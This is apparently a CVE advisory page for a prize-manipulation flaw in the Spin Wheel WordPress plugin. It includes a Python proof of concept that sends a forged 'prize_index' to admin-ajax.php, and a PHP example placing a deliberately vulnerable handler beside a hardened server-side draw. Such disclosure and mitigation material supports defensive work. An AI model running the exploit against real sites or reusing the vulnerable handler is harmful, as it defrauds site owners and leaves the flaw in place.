Security Vulnerability Report
CVE-2026-0808 (CVSS 5.3 MEDIUM)

Published: 2026-01-17 07:16:02
Last Modified: 2026-04-15 00:35:42

Description

The Spin Wheel plugin for WordPress is vulnerable to client-side prize manipulation in all versions up to, and including, 2.1.0. This is due to the plugin trusting client-supplied prize selection data without server-side validation or randomization. This makes it possible for unauthenticated attackers to manipulate which prize they win by modifying the 'prize_index' parameter sent to the server, allowing them to always select the most valuable prizes.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Spin Wheel plugin for WordPress <= 2.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2026-0808 PoC - Spin Wheel Prize Manipulation
# Target: WordPress site with Spin Wheel plugin <= 2.1.0
target_url = "http://target-wordpress-site.com/"
ajax_endpoint = target_url + "wp-admin/admin-ajax.php"

# Step 1: Identify the prize indices by analyzing the plugin's prize configuration
# Prize indices typically start from 0 (e.g., 0, 1, 2, 3...)

# Step 2: Intercept a normal spin request and modify the prize_index parameter
payload = {
    "action": "swp_spin_wheel",
    "prize_index": "0",  # Change this to target high-value prize index
    "nonce": "attacker_provided_or_empty",
}

# Step 3: Send the manipulated request
response = requests.post(ajax_endpoint, data=payload)
print(f"Response Status: {response.status_code}")
print(f"Response Content: {response.text}")

# Expected result: Win the prize at the specified index
# Modify prize_index value (e.g., 0, 1, 2) to target different prizes
# Higher value prizes are typically at lower index positions
```
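The flaw class behind this record (CWE-602, server trusting a client-chosen outcome), shown as an added example that is not the Spin Wheel plugin's code: a hypothetical WordPress AJAX handler that honours the client's prize_index next to a hardened one that verifies the nonce and draws the prize server-side. The prize table, the 'swp_spin' nonce action and the function names are assumptions; only the 'swp_spin_wheel' action and the 'prize_index' and 'nonce' parameter names come from the page.

```php
<?php
// Added illustration, not the Spin Wheel plugin's code. $prizes is a
// constructed example of a site's prize configuration (assumption).
$prizes = array(
    array( 'label' => 'Grand prize', 'weight' => 1 ),
    array( 'label' => '10% coupon',  'weight' => 30 ),
    array( 'label' => 'Try again',   'weight' => 69 ),
);

// Vulnerable pattern (CWE-602): the server returns whatever index the
// client sent, so the spin animation is the only "randomness" involved.
function swp_spin_vulnerable() {
    global $prizes;
    $index = isset( $_POST['prize_index'] ) ? intval( $_POST['prize_index'] ) : 0;
    wp_send_json_success( array( 'prize' => $prizes[ $index ]['label'] ) );
}

// Hardened pattern: weighted draw performed server-side with wp_rand(),
// which prefers a CSPRNG (random_int) where PHP provides one.
function swp_pick_prize_index( array $prizes ) {
    $total = 0;
    foreach ( $prizes as $p ) {
        $total += max( 0, (int) $p['weight'] );
    }
    $roll = wp_rand( 1, $total );
    foreach ( $prizes as $i => $p ) {
        $roll -= max( 0, (int) $p['weight'] );
        if ( $roll <= 0 ) {
            return $i;
        }
    }
    return count( $prizes ) - 1; // unreachable unless all weights are 0
}

function swp_spin_hardened() {
    global $prizes;
    // Rejects a missing or forged 'nonce' field; 'swp_spin' is an assumed action name.
    check_ajax_referer( 'swp_spin', 'nonce' );
    // $_POST['prize_index'] is deliberately never read: the client only
    // learns the outcome, it does not choose it.
    $index = swp_pick_prize_index( $prizes );
    wp_send_json_success( array(
        'prize_index' => $index,
        'prize'       => $prizes[ $index ]['label'],
    ) );
}

add_action( 'wp_ajax_swp_spin_wheel', 'swp_spin_hardened' );
add_action( 'wp_ajax_nopriv_swp_spin_wheel', 'swp_spin_hardened' );
```

A complete fix also records the server-side draw (per session or user) before it is revealed, so any later "claim prize" request can be checked against it rather than against client-supplied data.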

References

https://plugins.trac.wordpress.org/browser/spin-wheel/tags/2.0.2/includes/class-swp-ajax.php#L73
https://plugins.trac.wordpress.org/browser/spin-wheel/trunk/includes/class-swp-ajax.php#L73
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3437726%40spin-wheel&new=3437726%40spin-wheel&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/c023b91e-f633-41a6-b2d7-bcb3f1d026b7?source=cve

Weakness
CWE-602

Record Status
Deferred

Exploitability Score
3.9
Impact Score
1.4